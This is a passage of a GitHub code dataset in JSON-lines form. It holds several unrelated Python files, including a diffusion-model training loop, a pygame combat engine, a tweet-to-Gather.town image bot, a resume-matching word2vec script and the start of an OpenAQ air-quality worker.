each basket.\n\n# Input Specification:\n# input 1: N, denoting the number of baskets.\n# input 2: array representing the number of apples in the ith basket.\n\n# Output :\n# Return the minimum number of apples that must be moved so that all baskets have the same number of apples.\n\n# Example 1:\n\n# input 1: 2\n# input 2 : [1, 3]\n\n# output : 1\n\n# input 1: 5\n# input 2: [2849, 1620, 705, 1, 30]\n\n# output : 2387\n\n\n\ndef equality(ar, n):\n s = sum(ar) // n\n res = 0\n for i in ar:\n if i > s:\n res += i - s\n\n return res\n\n\nn = int(input())\nar = list(map(int, input().split()))\nprint(equality(ar, n))","repo_name":"Pyk017/Competetive-Programming","sub_path":"Virtusa_Test_Questions/Equal_Apples.py","file_name":"Equal_Apples.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"6200320139","text":"import argparse\nimport os\nimport json\nfrom pathlib import Path\nfrom copy import deepcopy\nimport torch\nimport torch.nn.functional as F\nimport torch.utils.tensorboard\nimport torchvision.transforms.functional as TF\nimport lantern\nfrom lantern import set_seeds, worker_init_fn\nimport nicefid\nimport wandb\n\nimport data\nfrom monster_diffusion.model.model import Model\nfrom monster_diffusion import metrics\nfrom monster_diffusion.log_examples import log_examples\nfrom monster_diffusion.model.variational_encoder import VariationalEncoderLDM\nfrom monster_diffusion.generate_samples import generate_samples\nfrom monster_diffusion.generate_cheat_samples import generate_cheat_samples\nfrom monster_diffusion.tools.seeded_randn import seeded_randn\nfrom monster_diffusion.tools.inverse_lr import InverseLR\nfrom monster_diffusion.kl_weight_controller import KLWeightController\nfrom monster_diffusion.model.ema import EMAWarmup, ema_update\nfrom monster_diffusion import settings\n\n\ndef train(config):\n set_seeds(config[\"seed\"])\n device = torch.device(\"cuda\" if config[\"use_cuda\"] else \"cpu\")\n torch.set_grad_enabled(False)\n\n model = Model().eval().to(device)\n average_model = deepcopy(model).eval()\n variational_encoder = VariationalEncoderLDM().eval().to(device)\n optimizer = torch.optim.AdamW(\n list(model.parameters()) + list(variational_encoder.parameters()),\n lr=config[\"learning_rate\"],\n betas=(0.95, 0.999),\n eps=1e-6,\n weight_decay=1e-3,\n )\n scheduler = InverseLR(optimizer, inv_gamma=20000, power=1, warmup=0.99)\n ema_scheduler = EMAWarmup(power=0.6667, max_value=0.9999)\n kl_weight_controller = KLWeightController(\n weights=[0.001],\n targets=[config[\"kl_target\"]],\n )\n\n train_datastream = data.train_datastream()\n\n train_data_loader = train_datastream.data_loader(\n batch_size=config[\"batch_size\"],\n n_batches_per_epoch=config[\"evaluate_every\"],\n collate_fn=list,\n num_workers=config[\"n_workers\"],\n worker_init_fn=worker_init_fn(config[\"seed\"]),\n persistent_workers=(config[\"n_workers\"] >= 1),\n )\n\n evaluate_datastreams = data.evaluate_datastreams()\n evaluate_data_loaders = {\n f\"evaluate_{name}\": (\n (\n evaluate_datastreams[name].data_loader(\n batch_size=config[\"evaluate_batch_size\"],\n collate_fn=list,\n num_workers=config[\"n_workers\"],\n )\n )\n )\n for name in [\n # \"train\",\n \"early_stopping\",\n ]\n }\n\n def generator(data_loader):\n for examples in data_loader:\n yield torch.stack(\n [TF.to_tensor(example.image).div(255) for example in examples]\n )\n\n reference_features = {\n name: nicefid.Features.from_iterator(generator(data_loader))\n for name, data_loader in evaluate_data_loaders.items()\n }\n\n if Path(\"model\").exists():\n print(\"Loading model checkpoint\")\n model.load_state_dict(torch.load(\"model/model.pt\", map_location=device))\n average_model.load_state_dict(\n torch.load(\"model/average_model.pt\", map_location=device)\n )\n variational_encoder.load_state_dict(\n torch.load(\"model/variational_encoder.pt\", map_location=device)\n )\n optimizer.load_state_dict(torch.load(\"model/optimizer.pt\", map_location=device))\n lantern.set_learning_rate(optimizer, config[\"learning_rate\"])\n kl_weight_controller.load_state_dict(\n torch.load(\"model/kl_weight_controller.pt\", map_location=device)\n )\n\n tensorboard_logger = torch.utils.tensorboard.SummaryWriter(log_dir=\"tb\")\n early_stopping = lantern.EarlyStopping(tensorboard_logger=tensorboard_logger)\n train_metrics = metrics.train_metrics()\n\n n_train_steps = 0\n for _ in lantern.Epochs(config[\"max_steps\"] // config[\"evaluate_every\"]):\n\n for examples in lantern.ProgressBar(train_data_loader, \"train\", train_metrics):\n images = torch.stack(\n [TF.to_tensor(example.image) for example in examples]\n ).div(255)\n nonleaky_augmentations = torch.stack(\n [\n torch.from_numpy(example.nonleaky_augmentations)\n for example in examples\n ]\n )\n\n ts = Model.training_ts(len(examples))\n noise = torch.randn_like(images.float())\n diffused = model.diffuse(images, ts, noise)\n with lantern.module_train(model), lantern.module_train(\n variational_encoder\n ), torch.enable_grad():\n variational_features = variational_encoder.features_(images, noise)\n predictions = model.predictions_(\n diffused,\n ts,\n nonleaky_augmentations,\n variational_features,\n )\n variational_losses = variational_features.losses()\n variational_loss = variational_losses.mean()\n loss = (\n predictions.loss(images, noise)\n + kl_weight_controller.weights[0]\n * F.softplus(\n variational_losses.log()\n - torch.tensor(kl_weight_controller.targets[0]).log(),\n beta=5,\n ).mean()\n )\n loss.backward()\n torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm=1.0)\n optimizer.step()\n optimizer.zero_grad()\n scheduler.step()\n ema_decay = ema_scheduler.get_value()\n ema_update(model, average_model, ema_decay)\n ema_scheduler.step()\n\n if n_train_steps >= 100:\n kl_weight_controller.update_([variational_loss])\n\n n_train_steps += 1\n\n tensorboard_logger.add_scalar(\n \"learning_rate\", scheduler.get_lr()[0], n_train_steps\n )\n tensorboard_logger.add_scalar(\n \"variational_weight\", kl_weight_controller.weights[0], n_train_steps\n )\n tensorboard_logger.add_scalar(\n \"kl_target\", kl_weight_controller.targets[0], n_train_steps\n )\n\n train_metrics[\"loss\"].update_(loss)\n train_metrics[\"variational_loss\"].update_(variational_loss)\n train_metrics[\"image_mse\"].update_(predictions.image_mse(images))\n train_metrics[\"eps_mse\"].update_(predictions.eps_mse(noise))\n\n for metric in train_metrics.values():\n metric.log_dict(tensorboard_logger, \"train\", n_train_steps)\n\n print(lantern.MetricTable(\"train\", train_metrics))\n log_examples(tensorboard_logger, \"train\", n_train_steps, examples, predictions)\n\n for n_evaluations in [20, 100, 1000]:\n tensorboard_logger.add_images(\n f\"samples/@{n_evaluations}\",\n torch.cat(\n [\n image.clamp(0, 1)\n for index, image in enumerate(\n model.sample(5, n_evaluations, progress=True)\n )\n if (index + 1) % (n_evaluations // 10) == 0\n ],\n dim=-2,\n ),\n n_train_steps,\n dataformats=\"NCHW\",\n )\n\n for name, data_loader in evaluate_data_loaders.items():\n evaluate_metrics = metrics.evaluate_metrics()\n for examples in lantern.ProgressBar(data_loader, name):\n images = torch.stack(\n [TF.to_tensor(example.image) for example in examples]\n ).div(255)\n nonleaky_augmentations = torch.stack(\n [\n torch.from_numpy(example.nonleaky_augmentations)\n for example in examples\n ]\n )\n\n evaluation_ts = average_model.evaluation_ts()\n choice = torch.tensor(\n [example.hash() % len(evaluation_ts) for example in examples]\n )\n ts = evaluation_ts[choice]\n noise = torch.stack(\n [\n seeded_randn(settings.INPUT_SHAPE, abs(example.hash()))\n for example in examples\n ]\n )\n\n with lantern.module_eval(variational_encoder):\n variational_features = variational_encoder.features(images, noise)\n\n diffused = average_model.diffuse(images, ts, noise)\n with lantern.module_eval(average_model):\n predictions = average_model.predictions(\n diffused,\n ts,\n nonleaky_augmentations,\n variational_features,\n )\n variational_losses = variational_features.losses()\n variational_loss = variational_losses.mean()\n loss = (\n predictions.loss(images, noise)\n + kl_weight_controller.weights[0]\n * F.softplus(\n variational_losses.log()\n - torch.tensor(kl_weight_controller.targets[0]).log(),\n beta=5,\n ).mean()\n )\n\n evaluate_metrics[\"loss\"].update_(loss)\n evaluate_metrics[\"variational_loss\"].update_(variational_loss)\n evaluate_metrics[\"image_mse\"].update_(predictions.image_mse(images))\n evaluate_metrics[\"eps_mse\"].update_(predictions.eps_mse(noise))\n\n for metric in evaluate_metrics.values():\n metric.log_dict(tensorboard_logger, name, n_train_steps)\n\n print(lantern.MetricTable(name, evaluate_metrics))\n log_examples(tensorboard_logger, name, n_train_steps, examples, predictions)\n\n n_evaluations = 100\n generated_features = nicefid.Features.from_iterator(\n generate_samples(model, n_evaluations=n_evaluations)\n )\n fid_scores = {\n name: nicefid.compute_fid(\n features,\n generated_features,\n )\n for name, features in reference_features.items()\n }\n for name, fid_score in fid_scores.items():\n tensorboard_logger.add_scalar(\n f\"{name}/fid@{n_evaluations}\", fid_score, n_train_steps\n )\n print(f\"{name}/fid@{n_evaluations}: {fid_score}\")\n\n n_evaluations = 20\n cheat_fid_scores = {\n name: nicefid.compute_fid(\n features,\n nicefid.Features.from_iterator(\n generate_cheat_samples(\n model,\n variational_encoder,\n evaluate_data_loaders[name],\n n_evaluations=n_evaluations,\n )\n ),\n )\n for name, features in reference_features.items()\n }\n for name, cheat_fid_score in cheat_fid_scores.items():\n tensorboard_logger.add_scalar(\n f\"{name}/cheat_fid@{n_evaluations}\",\n cheat_fid_score,\n n_train_steps,\n )\n print(f\"{name}/cheat_fid@{n_evaluations}: {cheat_fid_score}\")\n\n early_stopping = early_stopping.score(-fid_scores[\"evaluate_early_stopping\"])\n if early_stopping.scores_since_improvement == 0:\n torch.save(model.state_dict(), \"model.pt\")\n torch.save(average_model.state_dict(), \"average_model.pt\")\n torch.save(variational_encoder.state_dict(), \"variational_encoder.pt\")\n torch.save(optimizer.state_dict(), \"optimizer.pt\")\n torch.save(kl_weight_controller.state_dict(), \"kl_weight_controller.pt\")\n elif early_stopping.scores_since_improvement > config[\"patience\"]:\n break\n early_stopping.log(n_train_steps).print()\n\n tensorboard_logger.close()\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--batch_size\", type=int, default=40)\n parser.add_argument(\"--evaluate_batch_size\", type=int, default=32)\n parser.add_argument(\"--learning_rate\", type=float, default=5e-5)\n parser.add_argument(\"--kl_target\", type=float, default=1e-3)\n parser.add_argument(\"--max_steps\", type=int, default=5000 * 200)\n parser.add_argument(\"--evaluate_every\", default=5000, type=int)\n parser.add_argument(\"--patience\", type=float, default=10)\n parser.add_argument(\"--n_workers\", default=8, type=int)\n parser.add_argument(\"--debug\", default=0, type=int)\n args = parser.parse_args()\n\n config = vars(args)\n config.update(\n seed=1,\n use_cuda=torch.cuda.is_available(),\n run_id=os.getenv(\"RUN_ID\"),\n )\n\n Path(\"config.json\").write_text(json.dumps(config))\n\n if config[\"debug\"] == 0:\n wandb.init(\n project=\"monster-diffusion\",\n save_code=False,\n resume=\"never\",\n magic=True,\n anonymous=\"never\",\n id=config[\"run_id\"],\n name=Path(\".guild/attrs/label\").read_text(),\n tags=[config[\"run_id\"]],\n sync_tensorboard=True,\n config=config,\n )\n\n train(config)\n","repo_name":"samedii/monster-diffusion","sub_path":"operations/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":13614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"1228484519","text":"import pygame\r\nimport time\r\nimport random\r\nimport Enemy\r\nimport Player\r\nimport CombatEngine\r\nimport Items\r\nimport queue\r\n\r\n\r\npygame.init()\r\n\r\n\r\ndisplay_width = 1200\r\ndisplay_height = 800\r\n\r\nblack = (0,0,0)\r\nwhite = (255,255,255)\r\nred = (200,0,0)\r\ngreen = (0,200,0)\r\nbright_red = (255,0,0)\r\nbright_green = (0,255,0)\r\ngrey = (128,128,128)\r\n \r\nblock_color = (53,115,255)\r\n \r\nquitgame = pygame.quit\r\ngameDisplay = pygame.display.set_mode((display_width,display_height))\r\npygame.display.set_caption('Dungeons of Optional Doom')\r\nclock = pygame.time.Clock()\r\n\r\ndef text_objects(text, font, color):\r\n textSurface = font.render(text, True, color)\r\n return textSurface, textSurface.get_rect()\r\n\r\ndef button(msg,x,y,w,h,ic,ac,action=None):\r\n mouse = pygame.mouse.get_pos()\r\n click = pygame.mouse.get_pressed()\r\n print(click)\r\n if x+w > mouse[0] > x and y+h > mouse[1] > y:\r\n pygame.draw.rect(gameDisplay, ac,(x,y,w,h))\r\n\r\n if click[0] == 1 and action != None:\r\n action() \r\n else:\r\n pygame.draw.rect(gameDisplay, ic,(x,y,w,h))\r\n\r\n smallText = pygame.font.SysFont(\"times\",20)\r\n textSurf, textRect = text_objects(msg, smallText, black)\r\n textRect.center = ( (x+(w/2)), (y+(h/2)) )\r\n gameDisplay.blit(textSurf, textRect)\r\n\r\n\r\ndef text(msg,x,y,w,h,ic):\r\n pygame.draw.rect(gameDisplay, ic,(x,y,w,h))\r\n smallText = pygame.font.SysFont(\"times\",20)\r\n textSurf, textRect = text_objects(msg, smallText, black)\r\n textRect.center = ( (x+(w/2)), (y+(h/2)) )\r\n gameDisplay.blit(textSurf, textRect)\r\n\r\n\r\nclass Background(pygame.sprite.Sprite):\r\n def __init__(self, image_file, location):\r\n pygame.sprite.Sprite.__init__(self) #call Sprite initializer\r\n self.image = pygame.image.load(image_file)\r\n self.rect = self.image.get_rect()\r\n self.rect.left, self.rect.top = location\r\n\r\nBackGround = Background('B1.png', [0,0])\r\n\r\n#--------------------------------------------------------------------------------------------\r\n\r\nclass Combat:\r\n def __init__(self, player, enemy):\r\n self.player = player\r\n self.enemy = Enemy.enemies[enemy]\r\n self.EHP = self.enemy.hp\r\n self.enemypic = pygame.image.load(enemy + \".png\")\r\n self.enemypic = pygame.transform.scale(self.enemypic, (200, 200))\r\n self.plarmor = 5\r\n if self.player.armor[0] == True:\r\n self.plarmor += Items.items[self.player.armor[1]].defence\r\n self.run = True\r\n self.plAlive = True\r\n self.playerW1 = 0\r\n if self.player.righthand[0] == True:\r\n self.playerW1 = Items.items[self.player.righthand[1]].damage\r\n self.playerW2 = 0\r\n if self.player.lefthand[0] == True:\r\n self.playerW2 = Items.items[self.player.lefthand[1]].damage\r\n\r\n self.rawDam = self.playerW1 + self.playerW2 + self.player.strength\r\n self.enemyAlive = True\r\n\r\n\r\n\r\n#--------------------------------------------------------------------------------------------\r\n def blackout(self):\r\n counter = 0\r\n \r\n while counter != 30:\r\n \r\n for event in pygame.event.get():\r\n print(event)\r\n if event.type == pygame.QUIT:\r\n break\r\n gameDisplay.fill(black)\r\n\r\n if counter >= 5:\r\n medText = pygame.font.SysFont(\"times\",30)\r\n TextSurf, TextRect = text_objects(\"You got away safely\", medText, white)\r\n TextRect.center = ((display_width/2),(display_height/2))\r\n gameDisplay.blit(TextSurf, TextRect)\r\n\r\n pygame.display.update()\r\n clock.tick(15)\r\n counter += 1\r\n\r\n def death(self):\r\n counter = 0\r\n \r\n while counter != 45:\r\n \r\n for event in pygame.event.get():\r\n print(event)\r\n if event.type == pygame.QUIT:\r\n break\r\n gameDisplay.fill(red)\r\n\r\n if counter >= 5:\r\n medText = pygame.font.SysFont(\"times\",30)\r\n TextSurf, TextRect = text_objects(\"You Died\", medText, black)\r\n TextRect.center = ((display_width/2),(display_height/2))\r\n gameDisplay.blit(TextSurf, TextRect)\r\n\r\n pygame.display.update()\r\n clock.tick(15)\r\n counter += 1\r\n\r\n\r\n def escape(self):\r\n if self.player.agility > self.enemy.agl:\r\n self.run = False\r\n self.blackout()\r\n\r\n else:\r\n if random.choice([1,2,3,4,5,6,7,8,9,10]) > 5:\r\n self.run = False\r\n self.blackout()\r\n else:\r\n self.enemyTurn()\r\n\r\n def win(self):\r\n drops = []\r\n for drop in self.enemy.drops:\r\n counter = drop[1]\r\n for x in range(counter):\r\n drops.append(drop[0])\r\n\r\n drop = random.choice(drops)\r\n self.player.inventory.addItem(drop, 1)\r\n self.player.inventory.gold += self.enemy.gold\r\n self.run = False\r\n \r\n\r\n\r\n def enemyTurn(self):\r\n self.player.health -= self.calcEnemyDamage()\r\n\r\n def defend(self):\r\n self.player.health -= int(self.calcEnemyDamage() * .5)\r\n if self.player.health <= 0:\r\n self.plAlive = False\r\n \r\n def fight(self):\r\n self.enemy.hp -= self.rawDam\r\n self.enemyTurn()\r\n\r\n def skill(self):\r\n if self.player.mana >= 20:\r\n if self.player.health < (self.player.maxHealth-50):\r\n self.player.health+=50\r\n self.player.mana-=20\r\n else:\r\n self.player.health=self.player.maxHealth\r\n self.player.mana-=20\r\n self.enemyTurn()\r\n \r\n # Returns how much damage an enemy will do to the player\r\n def calcEnemyDamage(self):\r\n return int(self.enemy.attack * ((100 - self.plarmor)/100))\r\n\r\n#Combat-------------------------------------------------------------------------\r\n\r\n def combat_intro(self):\r\n\r\n while self.run and self.plAlive:\r\n for event in pygame.event.get():\r\n print(event)\r\n if event.type == pygame.QUIT:\r\n break\r\n \r\n gameDisplay.fill(white)\r\n gameDisplay.blit(BackGround.image, BackGround.rect)\r\n largeText = pygame.font.SysFont(\"times\", 100)\r\n medText = pygame.font.SysFont(\"times\",30)\r\n\r\n \r\n gameDisplay.blit(self.enemypic, (600,200))\r\n\r\n\r\n text(\"Cur HP\",200,100,100,50,white)\r\n text(\"Enemy HP\",200,150,100,50,white)\r\n button(\"Heal Spell\",100,700,100,50,green,bright_green,self.skill)\r\n text(str(self.player.health),300,100,100,50,white )\r\n text(str(self.enemy.hp),300,150,100,50,white)\r\n text(str(self.player.mana),100,650,100,50,white)\r\n button(\"Fight\",300,700,100,50,green,bright_green,self.fight)\r\n button(\"Defend\",500,700,100,50,green,bright_green,self.defend) \r\n button(\"Run\",700,700,100,50,red,bright_red,self.escape)\r\n \r\n\r\n pygame.display.update()\r\n clock.tick(15)\r\n\r\n if self.player.health <= 0:\r\n self.plAlive = False\r\n\r\n if self.enemy.hp <=0:\r\n self.enemyAlive = False\r\n self.win()\r\n\r\n if self.plAlive == False:\r\n self.death()\r\n \r\n self.enemy.hp = self.EHP\r\n return self.plAlive, self.player \r\n","repo_name":"bsuncin/SE_Game","sub_path":"CombatEngine.py","file_name":"CombatEngine.py","file_ext":"py","file_size_in_byte":7565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"73171779763","text":"import pickle\n# import dill as pickle\n\nclass MyClass:\n __my_lambda = staticmethod(lambda x: x * x + 1)\n\n def __init__(self):\n self.a_number = 35\n self.a_string = \"hey\"\n self.a_list = [1, 2, 3]\n self.a_dict = {\"first\": \"a\", \"second\": 2, \"third\": [1, 2, 3]}\n self.a_tuple = (22, 23)\n self.a_lambda = self.__my_lambda\n\n def print_attrs(self):\n for attr in self.__dict__:\n if attr.startswith(\"a_\"):\n print(self.__dict__[attr])\n\n def __getstate__(self):\n attributes = self.__dict__.copy()\n del attributes['a_lambda']\n return attributes\n \n def __setstate__(self, state):\n self.__dict__ = state\n self.a_lambda = self.__my_lambda\n\n \nmc = MyClass()\nmc_pickled = pickle.dumps(mc)\nmc_unpickled = pickle.loads(mc_pickled)\nmc_unpickled.print_attrs()\nprint(mc_unpickled.a_lambda(2))","repo_name":"still-coding/academyit_python_oop","sub_path":"code/p9_serde/pickle_serde.py","file_name":"pickle_serde.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"74838062641","text":"# (C) Ozgur Taylan TURAN 2019, Nov. (Delft University of Technology)\n# Import General Modules\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nplt.matplotlib.rc('xtick', labelsize=12)\nplt.matplotlib.rc('ytick', labelsize=12)\nplt.rcParams.update({'font.size': 16})\n################################################################################\n# 3D Plotting Option for GP\n################################################################################\ndef GP_3D_Surrogate(X,y,x1,x2,mean,std=None):\n fig = plt.figure(figsize=(8,5));\n ax = fig.add_subplot(111,projection='3d');\n ax.scatter(X[:,0],X[:,1],y,color='r');\n if std is None:\n surf = ax.plot_surface(x1, x2, mean, cmap=plt.cm.CMRmap, linewidth=0,\n antialiased=True, alpha=0.5);\n else:\n surf = ax.plot_surface(x1, x2, mean-2*std, cmap='binary', linewidth=0,\n antialiased=True, alpha=0.3);\n surf = ax.plot_surface(x1, x2, mean+2*std, cmap='binary', linewidth=0,\n antialiased=True, alpha=0.3);\n surf = ax.plot_surface(x1, x2, mean, cmap=plt.cm.CMRmap, linewidth=0,\n antialiased=True, alpha=0.5);\n ax.set_xlabel('x1');ax.set_ylabel('x2');ax.set_zlabel('x3')\n fig.colorbar(surf)\n################################################################################\n# 2D Plotting Option for GP\n################################################################################\ndef GP_2D_Surrogate(X, y, x, mean, std):\n plt.fill_between(x.ravel(),mean.ravel() + 2 * std,mean.ravel() - 2 * std,\n alpha=0.2,color='deepskyblue');\n plt.fill_between(x.ravel(),mean.ravel() + 1 * std,mean.ravel() - 1 * std,\n alpha=0.3,color='deepskyblue');\n\n plt.plot(x,mean,label='Surrogate-Function',color='deepskyblue')\n plt.plot(X,y,'o',markersize=6,color='deepskyblue',alpha=1,label='Sample Points')\n plt.xlabel('X')\n plt.ylabel('y')\n plt.title('2D GP Regression')\n #plt.legend()\n","repo_name":"taylanot/GP","sub_path":"Regression/GP_Plot_Reg.py","file_name":"GP_Plot_Reg.py","file_ext":"py","file_size_in_byte":2091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"31605005703","text":"import os\nimport requests\nimport textwrap\nimport json\nfrom time import sleep\nfrom PIL import Image, ImageDraw\n\nfrom config import (\n twitter_token,\n twitter_userid,\n gather_api_key,\n gather_space_id,\n gather_object_name,\n domain,\n gather_map_id,\n)\n\n\nBACKGROUND_COLOR = (16, 16, 16)\nTEXT_COLOR = (251, 224, 114)\nSTATIC_FOLDER = 'static'\n\nPORT = 8000\n\n\ndef format_tweet_text(text):\n if 'https://t.co' in text:\n link_index = text.index('https://t.co')\n text = text[:link_index]\n if len(text) > 140:\n text = text[:140]\n if ' ' in text:\n for symbol in text[::-1]:\n if symbol == ' ':\n index_of_first_space_in_returned_text = text[::-1].index(\n symbol)\n break\n index_of_last_space = len(\n text) - index_of_first_space_in_returned_text\n text = text[:index_of_last_space]\n text = text[:140] + ' [...]'\n return text\n\n\ndef make_payload(map_id=None, map_content=None):\n return {\n \"apiKey\": gather_api_key,\n \"spaceId\": gather_space_id,\n \"mapId\": map_id,\n \"mapContent\": map_content,\n }\n\n\ndef update_object_image(map_id, name, img):\n headers = {\"Content-type\": \"application/json\", \"Accept\": \"text/plain\"}\n new_payload = make_payload(map_id=map_id)\n data = requests.get(\"https://gather.town/api/getMap\", params=new_payload)\n map_data = data.json()\n objects = map_data[\"objects\"]\n for obj in objects:\n if obj[\"_name\"] == name:\n obj[\"highlighted\"] = img\n obj[\"normal\"] = img\n break\n map_data[\"objects\"] = objects\n new_payload = make_payload(map_id=map_id, map_content=map_data)\n requests.post(\n \"https://gather.town/api/setMap\",\n data=json.dumps(new_payload),\n headers=headers,\n )\n\nlast_tweet_id = 0\n\nwhile True:\n tweet_id = 0\n\n response = requests.get(\n 'https://api.twitter.com/2/users/{}/tweets?max_results=5'.format(\n twitter_userid),\n headers={'Authorization': 'Bearer {}'.format(twitter_token)})\n try:\n jsondata = response.json()\n tweet = jsondata['data'][0]\n text = format_tweet_text(tweet['text'])\n tweet_id = tweet['id']\n if tweet_id != last_tweet_id:\n print(\"Updating\")\n img = Image.new('RGB', (256, 64), color=BACKGROUND_COLOR)\n\n d = ImageDraw.Draw(img)\n d.text((4, 4), textwrap.fill(text.encode(\n 'latin-1', 'ignore').decode(), width=42), fill=TEXT_COLOR)\n\n if not os.path.exists(STATIC_FOLDER):\n os.makedirs(STATIC_FOLDER)\n\n img.save('./{}/{}.png'.format(STATIC_FOLDER, tweet_id))\n update_object_image(gather_map_id, gather_object_name,\n '{}/{}.png'.format(domain, tweet_id))\n\n last_tweet_id = tweet_id\n except:\n print('Could not update tweet')\n\n\n sleep(60)\n","repo_name":"GoodPraxis/gather-tweet-display","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"11793158242","text":"import json\nimport requests\nimport sqlite3 as db\n\nparams = {\n 'description':'python',\n}\nresponse = requests.get(\"https://jobs.github.com/positions.json?\",params = params,timeout = 3)\n\ndef insert(cursor,job):\n insert_query = 'insert into jobs(title,type,company) values(:title,:type,:company)'\n cursor.execute(insert_query,{'title':job['title'],'type':job['type'],'company':job['company']})\n\n\ndef get_job_counts_by_companies(cursor):\n pass\n\nif(response.ok):\n jobs_json = response.json()\n print(jobs_json)\n json_string = json.dumps(jobs_json,indent=4)\n print(json_string)\n connection = db.connect(\"jobs_database.db\")\n cursor = connection.cursor()\n jobs_table_query = '''\n CREATE TABLE jobs(\n id INTEGER PRIMARY KEY AUTOINCREMENT,\n title text,\n type text,\n company text\n )\n '''\n cursor.execute(jobs_table_query)\n for job in jobs_json:\n insert(cursor,job)\n connection.commit()\n\n cursor.close()\n connection.close()\n\nelse:\n print(\"some error happend with status code \",response.status_code)","repo_name":"sparrowV/hands_on_python","sub_path":"json_api_database/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"36508049791","text":"import nltk\nimport pickle as pkl\nfrom gensim.models import Word2Vec\nfrom nltk.corpus import stopwords\nfrom nltk.stem import PorterStemmer\nimport numpy as np\nimport parsers as pr\nfrom scipy import spatial\nimport pandas as pd\nimport os \ndef run(jd,corpus):\n\tmodel = Word2Vec.load('w2v_model')\n\tw2v = []\n\tjd = [PorterStemmer().stem(word) for word in nltk.word_tokenize(jd) if word not in stopwords.words('english') and word.isalnum()]\n\tfor word in jd:\n\t\tif word in model.wv.vocab:\n\t\t\tw2v.append(model.wv[word])\n\tvjd = np.mean(w2v, axis=0)\n\n\tvcv = []\n\tfor cvs in corpus:\n\t\tw2v = []\n\t\twith open(cvs, 'rb') as f:\n\t\t\tcv = pkl.load(f)\n\t\t\tfor word in cv:\n\t\t\t\tif word in model.wv.vocab:\n\t\t\t\t\tw2v.append(model.wv[word])\n\t\tvcv.append((np.mean(w2v, axis=0), cvs.split('/')[-1].split('.')[0]))\n\n\tres = []\n\tfor i in range(0, len(vcv)):\n\t\tres.append((1 - spatial.distance.cosine(vjd, vcv[i][0]), vcv[i][1]))\n\t#for i in range(0, len(cvc)):\n\t# retrieval.append((1 - spatial.distance.cosine(vjd, vcv[i][0]), vcv[i][1]))\n\n\tres.sort(reverse=True)\n\tprint(res[:15])\n\t\n\twith open('oput.pkl', 'wb') as op:\n\t\tpkl.dump(res, op)\n\n\tdf = pd.read_csv(\"db.csv\")\n\tresponse = {'cid':[], 'score':[], 'path':[]}\n\tfor i in range(20):\n\t\tresponse['cid'].append(res[i][1])\n\t\tresponse['score'].append(\"{:.1f}\".format(res[i][0]*100))\n\t\tresponse['path'].append(df[df['cid']==int(res[i][1])]['cv'].values[0])\n\n\treturn response\n\nif __name__ == '__main__':\n\twith open('jd.txt', 'r') as jd:\n\t\tgg = jd.read()\n\n\tresult = run(gg, pr.explore('corpus/tokenized'))\n\tprint(pd.DataFrame(result))\n\n\n\n\n","repo_name":"avinash3108/Recruitment-Assistant-using-NLP","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"36070717662","text":"from django.urls import path\n\nfrom . import views\nfrom .views import *\n\n\n\napp_name = 'accounts' # for using in app urls # path('ticketing/', include('ticketing.urls'))\nurlpatterns = [\n path('login', views.login_view , name='login'),\n path('logout', views.logout_view, name='logout'),\n path('profile/details', views.profile_details, name='profile_details'),\n path('profile/edit', views.profile_edit, name='profile_edit'),\n\n path('register', views.register, name='register'),\n\n path('payment/list', payment_list, name='payment_list'),\n path('payment/details/', payment_details, name='payment_details'),\n path('payment/create', payment_create, name='payment_create'),\n\n]","repo_name":"ohashemzadeh/cinema-django","sub_path":"accounts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"22616876272","text":"import json\nfrom node_listener.worker import Worker\nimport urllib\nimport urllib.error\nimport urllib.request\nimport urllib.parse\nimport node_listener.service.air_pollution as air\nfrom node_listener.service.hd44780_40_4 import Dump\n\n\nclass OpenaqWorker(Worker):\n url = \"https://api.openaq.org/v1/latest?\"\n\n def __init__(self, city, location, user_agent):\n self.city = city\n self.location = location\n self.user_agent = user_agent\n self._validate()\n\n def _validate(self):\n if self.city is None and self.location is None:\n raise AttributeError(\"city or location must be set\")\n\n def _fetch_data(self, url):\n try:\n request = urllib.request.Request(\n url, None, {'User-Agent': self.user_agent}\n )\n response = urllib.request.urlopen(request)\n data = response.read()\n json_data = json.loads(data.decode())\n Dump.module_status({'name': 'opnAQ', 'status': 2})\n except ValueError as e:\n json_data = None\n Dump.module_status({'name': 'opnAQ', 'status': 4})\n except urllib.error.HTTPError as e:\n print(e)\n json_data = None\n Dump.module_status({'name': 'opnAQ', 'status': 4})\n except urllib.error.URLError as e:\n print(e)\n json_data = None\n Dump.module_status({'name': 'opnAQ', 'status': 4})\n except ConnectionResetError as e:\n print(e)\n json_data = None\n Dump.module_status({'name': 'opnAQ', 'status': 4})\n except:\n Dump.module_status({'name': 'opnAQ', 'status': 5})\n raise\n\n return json_data\n\n def _get_url(self):\n url = self.url\n if self.city is not None:\n url = url + \"city=\"+urllib.parse.quote(self.city)\n\n if self.location is not None:\n if self.city is not None:\n url = url+\"&\"\n url = url + \"location=\"+urllib.parse.quote(self.location)\n\n return url\n\n def _normalize(self, data):\n values = {}\n for entry in data['results']:\n values[entry['location']] = {\n \"PM10\": None,\n \"PM25\": None,\n \"CO\": 